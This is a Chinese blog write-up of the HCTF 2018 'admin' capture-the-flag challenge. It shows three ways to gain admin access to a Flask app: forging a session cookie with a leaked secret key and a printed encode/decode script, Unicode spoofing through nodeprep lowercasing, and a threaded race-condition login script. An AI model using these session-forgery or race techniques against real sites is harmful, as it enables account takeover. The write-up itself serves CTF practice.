[BUUCTF][HCTF 2018]admin

最新推荐文章于 2024-09-26 23:17:44 发布
最新推荐文章于 2024-09-26 23:17:44 发布
阅读量1.2k 收藏
点赞数 3
分类专栏: 刷题记录 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/121364717
版权

考点

  1. flask session伪造
  2. unicode欺骗
  3. 条件竞争

法一:flask session伪造

查看源码,提示you are not admin,猜测需要admin登录

注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码

是一个flask框架,进入routes.py,看一下注册和登录部分的源码

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

@app.route('/login', methods = ['GET', 'POST'])
def login():
    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = LoginForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        session['name'] = name
        user = User.query.filter_by(username=name).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        return redirect(url_for('index'))
    return render_template('login.html', title = 'login', form = form)

根据登录逻辑,如果是已登陆状态,再次刷新会验证session,我们可以据此伪造成admin的session绕过登录

由于 flask 是非常轻量级的 Web框架 ,其 session 存储在客户端中(可以通过HTTP请求头Cookie字段的session获取),且仅对 session 进行了签名,缺少数据防篡改实现,这便很容易存在安全漏洞。

我们可以用python脚本把flask的session解密出来,但是如果想要加密伪造生成我们自己的session的话,还需要知道flask用来签名的SECRET_KEY

全局搜索,在config.py中发现

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

猜测这个ckj123就是密钥

使用脚本对其进行解加密

flask_session_manager.py

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

脚本有加密解密两种功能:

解密:
python flask_session_manager.py decode -c -s 
# -c是flask cookie里的session值 -s参数是SECRET_KEY
加密:
python flask_session_manager.py encode -s -t 
# -s参数是SECRET_KEY -t参数是session的参照格式,也就是session解密后的格式

先进行解密,将登录成功之后的cookie复制,填在对应参数后面(参数用引号括起来),得到:

image-20211116194522841

{'_fresh': True, '_id': b'34c682cab850f6adc36eca08b2c9be8e59105d8df741568de63e20758543f81b93568e59843adcf876fc1e877e2a19f9cd85aeb5970c424b680546afd81c78f2', 'csrf_token': b'd97754ea16e17aa9e761649413529025f0967910', 'image': b'wYpy', 'name': 'aaa', 'user_id': '10'}

将其中的name改为admin之后再进行加密

image-20211116194857026

将得到的cookie替换原来index页面的cookie即可伪造cookie,切换为admin用户

image-20211116195037724

关于flask中session的机制以及存在的漏洞,可以通过以下链接了解更多:

Python Web之flask session&格式化字符串漏洞

客户端 session 导致的安全问题

flask 源码解析:session

法二:Unicode欺骗

我们发现,不管是login、register还是change页面,只要是关于session['name']的操作,都先用了strlower函数将name转成小写,但是python中有自带的转小写函数lower,这里重写了一个,我们查看一下定义:

def strlower(username):
    username = nodeprep.prepare(username)
    return username

使用了nodeprep.prepare函数,该函数的作用是将大写转化为小写

但它同时会将unicode字符转换成A,而A再调用一次nodeprep.prepare函数会把A转换成a

也就是说我们可以使用ᴬdmin注册登录,登陆后再想办法让服务器再执行一次nodeprep.prepare,便可以变成admin账户

发现修改密码功能中存在

name = strlower(session['name'])

那么本题也就解出来了

法三:条件竞争

可以发现login函数和change函数都在没有完全check身份的情况下,执行了session有关的赋值。

我们可以这样设想,一个进程以正常账号一直依次进行登录、改密码操作,另一个进程同时一直依次进行注销、以admin用户名加进程1更改的新密码进行登录。就有可能出现当进程1进行到改密码函数时,进程2进行到登录操作,这个时候进程1需要从session中取出name,而进程2此时把session[‘name’]改成了admin。

条件竞争结束的标志为进程2登录操作成功,即重定向到/index

网上脚本:

import threading
import requests
import time

def login(s,username,password):
    data = {
        'username':username,
        'password':password,
        'submit':''
    }
    r  = s.post('http://13x.xx7.xx.xxx:9999/login',data=data)
    return r

def logout(s):
    s.get('http://13x.xx7.xx.xxx:9999/logout')

def change_pwd(s,newpass):
    data = {
        'newpassword':newpass
    }
    s.post('http://13x.xx7.xx.xxx:9999/change',data=data)

def func1(s):
    try:
        login(s,'Miracle778','Miracle778')
        change_pwd(s,'Miracle778')
    except Exception:
        pass

def func2(s):
    try:
        logout(s)
        r = login(s,'admin','Miracle778')
        if '<a href="/index">/index</a>' in r.text:
            print(r.text)
            exit(0)
    except Exception:
        pass

for i in range(10000):
    print(i)
    s = requests.Session()
    t1 = threading.Thread(target=func1,args=(s,))
    t2 = threading.Thread(target=func2,args=(s,))
    t2.start()
    t1.start()

感觉思路很有道理,但自己没有跑出来

参考链接:

https://www.jianshu.com/p/f92311564ad0

Snakin_ya
关注
专栏目录
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
CG-CTF——WP(WEB[三])
hahaha233330的博客
01-11 523
CG-CTF——WriteUp(三) 工具: ①Winhex:图片隐写工具,这个很好用。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明 WEB 24、SQL注入1 听说你也会注入? 题目地址 打开题目出现了一个登陆界面,已经给了密码,直接。 点击 S...
BUUCTF学习笔记-admin
weixin_42271850的博客
03-18 3543
BUUCTF学习笔记-admin 时间:2020/03/17 考点:session欺骗、flask框架         首页中右键查看源代码,可以看到有一个提示。you are not admin,大概就能猜到这一题估计就是要使用admin的身份去登陆网站拿到flag。于是就使用账号admin密码123发现直接...
buuctfweb第一题
最新发布
2402_87039650的博客
09-26 135
看到登录页面,一般会想到万能密码或弱口令来爆破,先试弱密码。发现报错了密码部分,根据错误知是单引号闭合。用户名admin 密码adminbuuctfweb第一题。显示用户名错误,加单引号。
web buuctf [HCTF 2018]admin1
weixin_44214568的博客
03-13 2986
查看首页源代码,有注释 <!-- you are not admin --> 考虑这道题很有可能是用admin或者伪造admin进行登录, 用admin进行登录,随便填写密码进不去,发现页面有注册选项,用admin注册提示已经被注册 方法一:burp爆破 进入登录界面,用户名输admin,密码随便填,抓包对密码进行爆破; 爆破之后,提示429和302,可以看一下429的response,提示的是太多请求的问题, 更改options中的选项 控制数据量,我因为正.
xmctf web3-考核
Sk1y的博客
08-12 157
php session工作原理,session反序列化。
[HCTF 2018]admin
m0_62879498的博客
04-15 2262
[HCTF 2018]admin 一进入页面,发现,在未登录的情况下,我们只能访问3个页面index、login、register 同时我们观察 index 下的源码,发现 you are not admin 提示我们要进行登录 登录admin 可以进行 弱密码破解、sql访问数据库查看密码 当然,如果没有密码也可以,利用csrf漏洞,跨站请求伪造,让服务器以为我们是 admin 先进行弱密码破解,使用burpsuite 发现密码是 123 登录,获得flag 使用 bp 进行弱密码破解 破解
2018手工更新FlatLab Admin Template
09-15
"2018手工更新FlatLab Admin Template"是一款专为后台管理系统设计的模板,它集成了现代化的设计风格和丰富的功能组件。FlatLab以其扁平化的设计理念,提供了高效且直观的用户界面,使得管理员能够轻松地进行数据...
fastadmin事务管理系统
05-27
FastAdmin事务管理系统 FastAdmin事务管理系统是一种基于Web的事务管理系统,旨在帮助管理员更好地管理事务流程和数据。下面是该系统的一些重要知识点: 登录 Token 设计 FastAdmin的事务管理系统使用 Token-...
Ace Admin 2018.4最新版
04-17
"Ace Admin 2018.4最新版" 提供了最新的更新和改进,确保了开发者可以利用最新的技术进行开发。 Ace Admin 的核心特性包括: 1. **响应式布局**:它支持各种设备,从小屏幕手机到大屏幕桌面,都能提供良好的用户...
PgAdmin4安装包
07-26
**PgAdmin4详解** PgAdmin4是一款开源的图形化管理工具,专为PostgreSQL数据库管理系统设计,用于简化数据库的管理和开发。它提供了直观的用户界面,使得非编程背景的用户也能方便地执行常见的数据库操作,如创建、...
php三条连接一起访问,3CTF初赛题目详解(上)
weixin_31741827的博客
03-24 470
3CTF初赛已经落下帷幕,题目类型包括理论题和CTF夺旗,CTF夺旗主要涉及Web安全、数据包分析、取证分析、隐写、加解密编码等内容;目前wp已出炉,让我们一起围观~题目1:立誓要成为admin的男人题目类型:SQL注入解题思路:1.注册test用户,然后登陆,得到提示you are not admin2.回头看看,在登录处发现SQL盲注漏洞3.注出了user表的数据但是admin的密码没法解密。...
BUUCTF [HCTF 2018] admin
Senimo
12-10 1113
BUUCTF [HCTF 2018] admin解法一:弱密码解法二:Flask伪造Session解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启动环境: 简洁的页面和一个菜单栏,菜单栏中包含登陆、注册功能 查看网页源码,发现提示: <!-- you are not admin --> 提示需要用admin用户登陆 解法一:弱密码 尝试使用admin登陆,密码123: 登陆成功,可以得到flag 首先注册正常的账户: test test
buuctf [HCTF 2018]admin(flask cookie伪造)
qq_44111753的博客
01-02 1132
知识点 1、flask cookie伪造 2、flask中的SECRET_ KEY值作用 Flask、Django的 secret key 设置有什么用? SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用其名所示,加密的强度取决于变量值的机密度.不同的程序要使用不同的密钥,而且要保证其他人不知道你所用的字符串,SECRET_KEY的作用主要是提供一个值做各种HASH,主要的作用应该是在其加密过程中作为算法的一个参数(salt或其他).所以这个值的复杂度也就影响到了数据传输和存储
[CTF]No.0002 莫桑比克-php是最好的语言(待完善)
林毅洋
08-10 1491
每日一题CTF 0002莫桑比克-php是最好的语言来源:HBCTF第一场WP 类别:php伪协议、data协议 来源:http://www.moonsos.com/post/256.html 用到工具:HxD(16进制编辑器) 或 winhex      WINRAR 或 好压 (查看 CRC32)题目地址:http://123.206.66.106(已失效)右击查看源码you are
BUUCTF web admin (flask_session问题)
H4ppyD0g的博客
02-23 1438
检查源码,发现有注释<!-- you are not admin -->,应该是提示用admin账号登录。 两个功能,注册和登录,想到之前做过一个注册admin加空格的题,试了一下不成功。 然后老老实实注册一个普通用户 显示了自己的用户名,我们的目的因该是让自己的用户名变成admin才行。 change password只能修改自己账号的密码,没有漏洞。 post可能有xss漏洞,交...
CTFbuuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1969
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
BUUCTF WEB admin1
qq_41696858的博客
09-03 887
这题考的是flask框架的session机制 和我以前观念里不太一样的一点是flask这个框架,session是完全存在本地的,只不过存在着一种加密算法,把它加密了存在了本地,也就是说我们只要有了加密密钥,那session里的值是完全可以被我们修改的 打开场景,查看源码,/login,/register是提示you are not admin 那么就是要以admin权限登录了,几个页面翻了几遍也没找到sql注入啥的漏洞,那只能考虑越权了 先注册一个普通用户,test,1234,登录,查看页面源码,发现a链接
CTF WriteUp】2020第四届强网杯部分Crypto题解
cccchhhh6819的博客
08-24 7829
写在前边 强网杯还是难。。去年正赛赛题一道都不会,只能靠临时补充的强网先锋题目拿分的情景历历在目。今年也没好哪去,只能写一点是一点吧。 modestudy 这道题是一道六合一块密码大杂烩,考察基础知识与变换,六道小的题目全做完以后拿到flag。其中4、5、6三道题需要大量交互,因此答案不变,可以单次做完后保留答案一起提交。1、2、3三道题当场变换即可。 Stage 1 [$] challenge 1 [+] cookie:session=6b1f33a78c5b9c17;admin=0;checksum=5
Django admin添加自定义Action教程
"Python Django给admin添加Action的方法实例详解" 在Django框架中,admin站点是一个强大的工具,允许开发者快速地管理数据库模型。默认情况下,它提供了基础的数据操作功能,如查看、添加、编辑和删除记录。然而,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值